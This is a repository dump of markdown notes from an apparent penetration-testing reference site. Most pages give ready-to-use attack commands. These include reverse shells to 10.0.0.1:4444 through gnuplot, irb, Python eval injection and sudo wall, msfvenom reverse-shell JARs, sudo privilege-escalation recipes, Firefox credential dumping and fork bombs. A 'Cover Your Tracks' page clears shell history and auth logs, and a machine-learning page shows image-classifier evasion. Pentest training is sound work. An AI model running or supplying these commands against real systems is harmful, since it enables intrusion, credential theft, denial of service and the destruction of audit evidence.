22 | 23 | ## Commands in the Server 24 | 25 | ```bash 26 | # Print usage 27 | help 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/hardware/_data.yml: -------------------------------------------------------------------------------- 1 | category1: hardware 2 | related_menus: 3 | - title: Others 4 | id: others -------------------------------------------------------------------------------- /src/exploit/hardware/gerber-files.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gerber (GBR) Files 3 | description: The Gerber format is an ASCII, vector format for printed circuit board (PCB) designs. 4 | tags: 5 | - Hardware 6 | refs: 7 | date: 2023-03-23 8 | draft: false 9 | --- 10 | 11 | ## Gerber Viewer 12 | 13 | There are many online tools to view GBR file. 14 | 15 | - [Online Gerber Viewer](https://www.pcbway.com/project/OnlineGerberViewer.html) -------------------------------------------------------------------------------- /src/exploit/hardware/netgear-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: NETGEAR Pentesting 3 | description: NETGEAR produces networking hardware for consumers, businesses, and service providers. 4 | tags: 5 | - Hardware 6 | - IoT 7 | refs: 8 | date: 2023-01-06 9 | draft: false 10 | --- 11 | 12 | ## Enumeration 13 | 14 | ```sh 15 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502 16 | ``` 17 | 18 |
19 | 20 | ## Default Credentials 21 | 22 | ```txt 23 | admin:password 24 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/_data.yml: -------------------------------------------------------------------------------- 1 | category1: linux 2 | related_menus: 3 | - title: Privilege Escalation 4 | id: privilege-escalation 5 | - title: Post Exploitation 6 | id: post-exploitation 7 | - title: Backup 8 | id: backup 9 | - title: Container 10 | id: container 11 | - title: Archive 12 | id: archive 13 | - title: Attack 14 | id: attack 15 | - title: Protocol 16 | id: protocol 17 | - title: Management 18 | id: management -------------------------------------------------------------------------------- /src/exploit/linux/archive/7z.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: 7z 3 | description: The 7z command is a compression utility that is used to compress and decompress files in Unix, Linux, and other operating systems. 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Compress 12 | 13 | ```sh 14 | # a: Add files to archive 15 | 7z a example.zip example.txt 16 | # With password 17 | 7z a example.zip example.txt -p password 18 | ``` 19 | 20 |
21 | 22 | ## Decompress 23 | 24 | ```sh 25 | # e: Extract files from archive 26 | 7z e example.zip 27 | # With password 28 | 7z e example.zip -p password 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/_data.yml: -------------------------------------------------------------------------------- 1 | category2: archive -------------------------------------------------------------------------------- /src/exploit/linux/archive/bzip-bunzip.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Bzip2 & Bunzip2 3 | description: Bzip2 command is a compression utility in Unix, Linux and other operating systems. It is used to compress and decompress files to reduce their size. 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Compress 12 | 13 | ```sh 14 | bzip2 example.txt 15 | ``` 16 | 17 |
18 | 19 | ## Decompress 20 | 21 | ```sh 22 | bzip2 -d example.txt.bz2 23 | bunzip2 example.txt.bz2 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/crack-7z-password.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Crack 7z Password 3 | description: If a 7z file is password-protected, we can try to crack the password. 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2024-12-18 8 | draft: false 9 | --- 10 | 11 | ## Crack 12 | 13 | ### 1. Convert to Hash 14 | 15 | First we need to convert the `.7z` file to a hash. 16 | 17 | ```sh 18 | 7z2john example.7z > hash.txt 19 | # or 20 | /usr/share/john/7z2john.pl example.7z > hash.txt 21 | ``` 22 | 23 | If we get the error “`Can't locate Compress/Raw/Lzma.pm in @INC`...”, we need to install the `libcompress-raw-lzma-perl` package: 24 | 25 | ```bash 26 | sudo apt install libcompress-raw-lzma-perl 27 | ``` 28 | 29 | ### 2. Crack the Hash 30 | 31 | Now we can crack the hash with one of the commands below: 32 | 33 | ```sh 34 | john --wordlist=wordlist.txt hash.txt 35 | # or 36 | hashcat -m 11600 hash.txt wordlist.txt 37 | ``` 38 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/gzip-gunzip.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gzip & Gunzip 3 | description: The gzip command is a utility that is used to compress and decompress files to reduce their size. The name "gzip" stands for "GNU zip". 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Compress 12 | 13 | ```sh 14 | gzip example.txt 15 | ``` 16 | 17 |
18 | 19 | ## Decompress 20 | 21 | ```sh 22 | gzip -d example.txt.gz 23 | gunzip example.txt.gz 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/linux/archive/tar.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Tar 3 | description: Tar command is a utility that is used to create, manipulate, and extract archived files. "tar" stands for "tape archive". 4 | tags: 5 | - Archive 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Archive Files 12 | 13 | ```sh 14 | # -c: Create a new archive 15 | # -f: Use archive file 16 | tar -cf archive.tar example.txt 17 | tar -cf archive.tar example1.txt example2.txt 18 | # -z: filter the archive through gzip 19 | tar -zcf example.tar.gz example/ 20 | ``` 21 | 22 |
23 | 24 | ## Extract Files 25 | 26 | ```sh 27 | # -x: Extract files from an archive 28 | # -f: Use archive file 29 | tar -xf archive.tar 30 | tar -xf archive.tar.gz 31 | # output given directory 32 | tar -xf archive.tar --directory archived 33 | ``` 34 | 35 |
36 | 37 | ## Display Contents without Extracting 38 | 39 | ```sh 40 | tar -tf archive.tar 41 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/attack/_data.yml: -------------------------------------------------------------------------------- 1 | category2: attack -------------------------------------------------------------------------------- /src/exploit/linux/attack/fork-bomb.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Fork Bomb 3 | description: A fork bomb is a denial-of-service attack that leads the system to deplete its available resources by replicating child processes indefinitely. 4 | tags: 5 | - Linux 6 | refs: 7 | - https://www.geeksforgeeks.org/zombie-processes-prevention/?ref=ml_lbp 8 | - https://www.imperva.com/learn/ddos/fork-bomb/ 9 | date: 2023-07-24 10 | draft: false 11 | --- 12 | 13 | ### Warning 14 | 15 | **Please don’t execute the following programs in a system that you don’t want to harm.** 16 | 17 | ## Exploitation in C 18 | 19 | This program forks child processes continuously. 20 | 21 | ```c 22 | #include 23 | #include 24 | 25 | int main() 26 | { 27 | while (1) 28 | // Create a child process from the parent process. 
29 | fork(); 30 | return 0; 31 | } 32 | ``` 33 | 34 | ## Exploitation in Python 35 | 36 | ```python 37 | import os 38 | 39 | while True: 40 | os.fork() 41 | ``` 42 | 43 | ## Exploitation in Bash 44 | 45 | ```bash 46 | :(){ :|: & };: 47 | ``` 48 | -------------------------------------------------------------------------------- /src/exploit/linux/backup/_data.yml: -------------------------------------------------------------------------------- 1 | category2: backup -------------------------------------------------------------------------------- /src/exploit/linux/backup/borgbackup-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: BorgBackup Pentesting 3 | description: A deduplicating backup program. 4 | tags: 5 | - Backup 6 | - Linux 7 | refs: 8 | date: 2023-04-10 9 | draft: false 10 | --- 11 | 12 | ## Extract Archives 13 | 14 | ```sh 15 | borg extract /path/to/archive:: 16 | Enter passphrase: 17 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/container/_data.yml: -------------------------------------------------------------------------------- 1 | category2: container -------------------------------------------------------------------------------- /src/exploit/linux/management/_data.yml: -------------------------------------------------------------------------------- 1 | category2: management -------------------------------------------------------------------------------- /src/exploit/linux/post-exploitation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: post-exploitation -------------------------------------------------------------------------------- /src/exploit/linux/post-exploitation/cover-your-tracks-in-linux.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Cover Your Tracks in Linux 3 | description: After exploitation in Linux 
system, attackers want to erase their activities and be undetectable. 4 | tags: 5 | - Post Exploitation 6 | refs: 7 | - https://null-byte.wonderhowto.com/how-to/clear-logs-bash-history-hacked-linux-systems-cover-your-tracks-remain-undetected-0244768/ 8 | - https://www.poplabsec.com/how-to-cover-your-tracks-on-linux/ 9 | date: 2023-11-15 10 | draft: false 11 | --- 12 | 13 | ## Clear History 14 | 15 | ```bash 16 | unset HISTORY 17 | echo '' > ~/.bash_history 18 | echo '' > /root/.bash_history 19 | history -c 20 | export HISTSIZE=0 21 | unset HISTFILE 22 | ``` 23 | 24 |
25 | 26 | ## Clear Logs 27 | 28 | ```bash 29 | # Shrink the size of log files with `truncate -s 0` 30 | truncate -s 0 /var/log/auth.log 31 | echo '' > /var/log/auth.log 32 | cat /dev/null > /var/log/auth.log 33 | > /var/log/auth.log 34 | dd if=/dev/null of=/var/log/auth.log 35 | shred /var/log/auth.log 36 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/_data.yml: -------------------------------------------------------------------------------- 1 | category2: privilege-escalation -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/doas/_data.yml: -------------------------------------------------------------------------------- 1 | category3: doas -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/doas/index.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Doas Privilege Escalation 3 | description: doas executes arbitrary commands as another user. It's similar to the sudo command. doas.conf is interesting for privilege escalation. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | date: 2023-03-07 9 | draft: false 10 | --- 11 | 12 | ## Investigation 13 | 14 | First, find the location of doas.conf. 15 | 16 | ```sh 17 | find / -type f -name "doas.conf" 2>/dev/null 18 | ``` 19 | 20 | Next, check the configuration. 21 | 22 | ```sh 23 | doas -C /path/to/doas.conf 24 | doas -C /etc/doas.conf 25 | # or 26 | cat /etc/doas.conf 27 | ``` 28 | 29 | Execute doas as below. 30 | 31 | ```sh 32 | doas -u root 33 | ``` 34 | 35 | Please also refer to [GTFOBins](https://gtfobins.github.io/) for PrivEsc. 
-------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/firefox-credentials-dumping.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: FireFox Credentials Dumping 3 | description: A .mozilla directory contains a firefox directory that stores credentials. We may dump the credentials and escalate privileges using them. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2024-10-03 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | If there is a `.mozilla/firefox` directory in a user's home directory, we can dump credentials. Check this directory: 14 | 15 | ```sh 16 | ls -al /home/<user>/.mozilla/ 17 | ``` 18 | 19 |
20 | 21 | ## Dump Passwords from Firefox Profile 22 | 23 | To decrypt the stored passwords, use [firefox_decrypt](https://github.com/unode/firefox_decrypt): 24 | 25 | ```sh 26 | python3 firefox_decrypt.py .mozilla/firefox/ 27 | ``` 28 | 29 | If we are asked for the master password and don’t know it, try common passwords. 30 | 31 | ```txt 32 | admin 33 | password 34 | password1 35 | password123 36 | root 37 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/ghidra-debug-mode-rce.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Ghidra Debug Mode RCE 3 | description: 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | - https://www.youtube.com/watch?v=N3VcWIUpgfE 9 | - https://github.com/NationalSecurityAgency/ghidra/issues/6 10 | date: 2023-03-31 11 | draft: false 12 | --- 13 | 14 | ## Exploitation 15 | 16 | ```bash 17 | jdb -attach 127.0.0.1:18001 18 | > classpath 19 | > classes 20 | Log4j2-TF-4-Scheduled-1[1] stop in org.apache.logging.log4j.core.util.WatchManager$WatchRunnable.run() 21 | Log4j2-TF-4-Scheduled-1[1] print new java.lang.Runtime().exec("nc 10.0.0.1 4444 -e /bin/sh") 22 | ``` 23 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/gnuplot-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Gnuplot Privilege Escalation 3 | description: gnuplot is a command-line and GUI program that can generate two- and three-dimensional plots of functions, data, and data fits. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | - http://gnuplot.info/docs_5.5/loc18483.html 9 | date: 2023-06-19 10 | draft: false 11 | --- 12 | 13 | ## Command Execution 14 | 15 | A **`gnuplot`** script file can be used to execute system commands, as shown below. 
16 | 17 | ```bash 18 | gnuplot test.plt 19 | ``` 20 | 21 | The contents of the **`.plt`** file look like the following. 22 | 23 | ```bash 24 | system "whoami" 25 | 26 | # Reverse shell 27 | system "bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" 28 | ``` 29 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/irb-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: irb (Interactive Ruby Shell) Privilege Escalation 3 | description: 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-03-28 8 | draft: false 9 | --- 10 | 11 | ## Exploitation 12 | 13 | ```bash 14 | irb 15 | 16 | # #q!: Define a string literal 17 | > exec %q!whoami! 18 | > exec %q!cp /bin/bash /tmp/bash; chmod +s /tmp/bash! 19 | > exec %q!bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"! 20 | ``` 21 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/python-eval-code-execution.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Python Eval Code Execution 3 | description: Python's eval() function is vulnerable to arbitrary code execution when it evaluates untrusted input. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | - Web 8 | refs: 9 | date: 2023-04-11 10 | draft: false 11 | --- 12 | 13 | ## Investigation 14 | 15 | ```py 16 | eval(text) 17 | eval(f"5 + {num}") 18 | ``` 19 | 20 | If the Python script lets us control the value of the **"text"** variable, we can inject arbitrary code. 21 | 22 |
23 | 24 | ## Arbitrary Code Execution 25 | 26 | Most of the time, we need to break out of the surrounding expression to execute our desired command. 27 | 28 | ```html 29 | __import__('os').system('id') 30 | 31 | 32 | ),__import__('os').system('id') 33 | '),__import__('os').system('id') 34 | },__import__('os').system('id') 35 | ),__import__('os').system('id')# 36 | ``` 37 | 38 | ### Reverse Shell 39 | 40 | ```html 41 | __import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"') 42 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/rust-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Rust Privilege Escalation 3 | description: Rust is a multi-paradigm, general-purpose programming language that emphasizes performance, type safety, and concurrency. If we have write permission on a Rust source file, we may be able to inject arbitrary code to escalate privileges. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | - https://book.hacktricks.xyz/linux-hardening/privilege-escalation 9 | date: 2023-06-27 10 | draft: false 11 | --- 12 | 13 | ## Reverse Shell 14 | 15 | Reference: https://github.com/LukeDSchenk/rust-backdoors/blob/master/reverse-shell/src/main.rs 16 | 17 | We can create a binary or module that spawns a reverse shell. 18 | 19 | ```bash 20 | cd /path/to/rust/project/src 21 | vim lib.rs 22 | (In vim editor, insert a reverse shell code into a file) 23 | cargo build 24 | ``` 25 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/snapd-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Snapd Privilege Escalation 3 | description: Snapd might be vulnerable to privilege escalation. 
4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | date: 2023-02-05 9 | draft: false 10 | --- 11 | 12 | 13 | ## dirty_sock (CVE-2019-7304) Version < 2.37 14 | 15 | Reference: [https://www.exploit-db.com/exploits/46361](https://www.exploit-db.com/exploits/46361) 16 | 17 | 18 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sssd-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: SSSD Privilege Escalation 3 | description: SSSD (System Security Services Daemon) provides a set of daemons to manage access to remote directory services and authentication mechanisms. 4 | tags: 5 | - Linux 6 | - Privilege Escalation 7 | refs: 8 | date: 2023-04-16 9 | draft: false 10 | --- 11 | 12 | ## Find Credentials 13 | 14 | ```bash 15 | ls -la /var/lib/sss/ 16 | 17 | # Find credentials 18 | # If we find the hash, crack it using John or Hashcat. 19 | strings /var/lib/sss/db/example.ldb 20 | ``` 21 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/_data.yml: -------------------------------------------------------------------------------- 1 | category3: sudo -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-client-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Fail2ban-Client Privilege Escalation 3 | description: Sudo fail2ban-client command might be vulnerable to privilege escalation (PrivEsc). 
4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2025-03-12 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | sudo -l 15 | 16 | # Output: 17 | (ALL) NOPASSWD: /usr/bin/fail2ban-client 18 | ``` 19 | 20 | If we can execute `fail2ban-client` command as root, we may be able to escalate privilege and gain a root shell. 21 | 22 | ## Exploit 23 | 24 | ```bash 25 | # Get jail list 26 | sudo /usr/bin/fail2ban-client status 27 | # Choose one of the jails from the "Jail list" in the output. 28 | sudo /usr/bin/fail2ban-client get actions 29 | # Create a new action with arbitrary name (e.g. "evil") 30 | sudo /usr/bin/fail2ban-client set addaction evil 31 | # Set payload to actionban 32 | sudo /usr/bin/fail2ban-client set action evil actionban "chmod +s /bin/bash" 33 | # Trigger the action 34 | sudo /usr/bin/fail2ban-client set banip 1.2.3.5 35 | # Now we gain a root 36 | /bin/bash -p 37 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-java-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Java Privilege Escalation 3 | description: Sudo Java is vulnerable to privilege escalation. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-14 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | sudo -l 15 | 16 | (root) /usr/bin/java -jar *.jar 17 | ``` 18 | 19 | If we can execute java command with arbitrary **`.jar`** file as root, we can escalate to privileges. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | ### 1. Create a JAR File 26 | 27 | First, create a custom jar file on the local machine. 28 | Replace **`<local-ip>`** with your local IP address. 29 | 30 | ```bash 31 | msfvenom -p java/shell_reverse_tcp LHOST=<local-ip> LPORT=4444 -f jar -o shell.jar 32 | ``` 33 | 34 | Then transfer the file to the remote machine. 35 | 36 | ### 2. Reverse Shell 37 | 38 | On the local machine, start a listener. 39 | 40 | ```bash 41 | nc -lvnp 4444 42 | ``` 43 | 44 | Now execute the java command as root on the target machine. 45 | 46 | ```bash 47 | sudo /usr/bin/java -jar /tmp/shell.jar 48 | ``` 49 | 50 | We should get a root shell. -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-path-traversal-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Path Traversal Privilege Escalation 3 | description: If some sudo command receives a file path, we might escalate privileges using path traversal. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (ALL) /usr/bin/node /usr/local/scripts/*.js 17 | ``` 18 | 19 | If the file path uses wildcards, we may execute arbitrary files. 20 | In short, we can refer to files in directories that the system owner did not intend. 21 | 22 |
23 | 24 | ## Exploitation 25 | 26 | Assume we can execute the ‘node’ command as root with a js file. 27 | Create **“test.js”** under **/tmp**, which spawns a root shell when run by the **‘node’** command. 28 | 29 | ```jsx 30 | // /tmp/test.js 31 | require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]}) 32 | ``` 33 | 34 | Now run the **‘node’** command as root. We can pass the file using path traversal. 35 | 36 | ```sh 37 | sudo /usr/bin/node /usr/local/scripts/../../../tmp/test.js 38 | ``` -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-screen-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Screen Privilege Escalation 3 | description: Sudo screen command might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (root) /usr/bin/screen -r testsession 17 | ``` 18 | 19 | If we can execute the **"screen"** command as root, we can spawn a root shell from the screen session. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | First execute the **"screen"** command as root; a screen session will start. 26 | Now we can spawn a root shell by pressing **“Ctrl+a+c”** in the screen session. 27 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-shutdown-poweroff-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Shutdown, Poweroff Privilege Escalation 3 | description: Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (ALL) NOPASS: /usr/sbin/shutdown 17 | ``` 18 | 19 | If we can execute the **"shutdown"** command as root, we can gain root privileges by placing our own **"poweroff"** earlier in **PATH** so that it is found instead of the real one. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | First create **/tmp/poweroff** binary which invoke a shell. 26 | 27 | ```sh 28 | echo /bin/sh > /tmp/poweroff 29 | # or 30 | echo /bin/bash > /tmp/poweroff 31 | ``` 32 | 33 | Then change permissions of the file and add **"/tmp"** folder to **PATH**. 34 | 35 | ```sh 36 | chmod +x /tmp/poweroff 37 | export PATH=/tmp:$PATH 38 | ``` 39 | 40 | Now execute **"shutdown"** as root. 41 | 42 | ```sh 43 | # Some SUID command 44 | sudo /usr/sbin/shutdown 45 | 46 | # Then you are root user 47 | root> 48 | ``` 49 | 50 | **/tmp/poweroff** is executed and spawn a root shell. 51 | 52 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-umount-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Umount Privilege Escalation 3 | description: Sudo umount is vulnerable to privilege escalation. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-15 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```bash 14 | sudo -l 15 | 16 | (root) NOPASSWD: /bin/umount 17 | ``` 18 | 19 | If we can execute umount command as root, we can escalate to privilege. 20 | 21 |
22 | 23 | ## Exploitation 24 | 25 | On the target machine, check which directories are mounted. 26 | 27 | ```bash 28 | cat /etc/fstab 29 | showmount -e localhost 30 | ``` 31 | 32 | Assume the **`/opt/example`** folder is mounted. 33 | If we unmount this folder, the original files that existed before the directory was mounted may appear. 34 | 35 | ```bash 36 | sudo /bin/umount /opt/example 37 | ls -al /opt/example 38 | ``` 39 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudo-wall-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudo Wall Privilege Escalation 3 | description: The wall command can display the output of an OS command. Executing it as root might be vulnerable to privilege escalation (PrivEsc). 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Investigation 12 | 13 | ```sh 14 | sudo -l 15 | 16 | (ALL) NOPASSWD: wall 17 | ``` 18 | 19 |
20 | 21 | ## Exploitation 22 | 23 | ```sh 24 | # Reverse shell 25 | sudo wall "$(bash -c 'bash -i >& /dev/tcp// 0>&1')" 26 | 27 | # Gets a SSH private key of another user 28 | sudo wall "$(cat /home/user/.ssh/id_rsa)" 29 | ``` 30 | -------------------------------------------------------------------------------- /src/exploit/linux/privilege-escalation/sudo/sudoedit-privilege-escalation.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Sudoedit Privilege Escalation 3 | description: Sudoedit is vulnerable to privilege escalation. 4 | tags: 5 | - Privilege Escalation 6 | refs: 7 | - https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf 8 | date: 2023-03-29 9 | draft: false 10 | --- 11 | 12 | ## Investigation 13 | 14 | ```bash 15 | sudo -l 16 | 17 | (root) sudoedit /opt/example.txt 18 | ``` 19 | 20 | If we can execute sudoedit command as root, we might be able to escalate the privileges with some version. 21 | 22 |
23 | 24 | ## Exploitation ([CVE-2023-22809](https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf)) 25 | 26 | ```bash 27 | export EDITOR="vim -- /etc/sudoers" 28 | sudoedit /opt/example.txt 29 | ``` 30 | 31 | In the vim editor, add the following line to **`/etc/sudoers`**. 32 | Assume the current username is “john”. 33 | 34 | ```bash 35 | john ALL=(ALL:ALL) ALL 36 | ``` 37 | 38 | After that, we can escalate to root privileges. 39 | 40 | ```bash 41 | sudo su root 42 | ``` 43 | -------------------------------------------------------------------------------- /src/exploit/linux/protocol/_data.yml: -------------------------------------------------------------------------------- 1 | category2: protocol -------------------------------------------------------------------------------- /src/exploit/linux/protocol/x11-pentesting.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: X11 (X Window System) Pentesting 3 | description: The X Window System is a windowing system for bitmap displays, common on Unix-like operating systems. Default ports are 6000, 6001. 
4 | tags: 5 | - Linux 6 | refs: 7 | date: 2023-02-05 8 | draft: false 9 | --- 10 | 11 | ## Enumeration 12 | 13 | ```bash 14 | nmap --script x11-access -p 6000 15 | 16 | msf> use auxiliary/scanner/x11/open_x11 17 | ``` 18 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/_data.yml: -------------------------------------------------------------------------------- 1 | category1: machine-learning 2 | related_menus: 3 | - title: Data Processing 4 | id: data-processing 5 | - title: Computer Vision 6 | id: computer-vision 7 | - title: LLM 8 | id: llm 9 | - title: Model 10 | id: model 11 | - title: Others 12 | id: others -------------------------------------------------------------------------------- /src/exploit/machine-learning/computer-vision/Image-Recognition-Bypass-for-Machine-Learning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Image Recognition Bypass for Machine Learning 3 | description: We can trick an image recognizer or classifier by applying filters to an image or otherwise obfuscating it. 4 | tags: 5 | - Computer Vision 6 | - Machine Learning 7 | refs: 8 | date: 2023-08-18 9 | draft: false 10 | --- 11 | 12 | Some of the following techniques are already ineffective, and others may become ineffective in the future. 13 | 14 | ## Blurring 15 | 16 | ```python 17 | from PIL import Image 18 | from PIL import ImageFilter 19 | 20 | img = Image.open("example.png") 21 | 22 | # Box blur 23 | img1 = img.filter(ImageFilter.BoxBlur(5)) 24 | # Gaussian blur 25 | img2 = img.filter(ImageFilter.GaussianBlur(5)) 26 | # Median filter 27 | img3 = img.filter(ImageFilter.MedianFilter(size=5)) 28 | # Rank filter 29 | img4 = img.filter(ImageFilter.RankFilter(size=13, rank=5)) 30 | ``` 31 | 32 |
33 | 34 | ## Cropping/Rotating 35 | 36 | ```python 37 | from PIL import Image 38 | from PIL import ImageFilter 39 | 40 | img = Image.open("example.png") 41 | img = img.resize((512, 512)) 42 | 43 | img1 = img.crop((0, 0, 300, 280)).rotate(-60) 44 | ``` 45 | -------------------------------------------------------------------------------- /src/exploit/machine-learning/computer-vision/_data.yml: -------------------------------------------------------------------------------- 1 | category2: computer-vision -------------------------------------------------------------------------------- /src/exploit/machine-learning/data-processing/_data.yml: -------------------------------------------------------------------------------- 1 | category2: data-processing -------------------------------------------------------------------------------- /src/exploit/machine-learning/data-processing/data-visualization-for-machine-learning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Data Visualization for Machine Learning 3 | description: 4 | tags: 5 | - Machine Learning 6 | refs: 7 | date: 2024-06-19 8 | draft: false 9 | --- 10 | 11 | ## Simple Example 12 | 13 | ```py 14 | import pandas as pd 15 | import matplotlib.pyplot as plt 16 | 17 | df = pd.read_csv('example.csv', index_col=0) 18 | 19 | plt.figure(figsize=(5, 6)) 20 | 21 | # Choose a graph type 22 | plt.bar(df['Name'], df['Age'], color='red') 23 | # or 24 | plt.scatter(df['Name'], df['Age'], alpha=0.5) 25 | 26 | # Set title and labels 27 | plt.title("Example Title") 28 | plt.xlabel("Name") 29 | plt.ylabel("Age") 30 | 31 | # Display 32 | plt.show() 33 | ``` -------------------------------------------------------------------------------- /src/exploit/machine-learning/data-processing/dimensionality-reduction-for-machine-learning.md: -------------------------------------------------------------------------------- 1 | --- 2 | title: Dimensionality Reduction for Machine Learning 3 | 
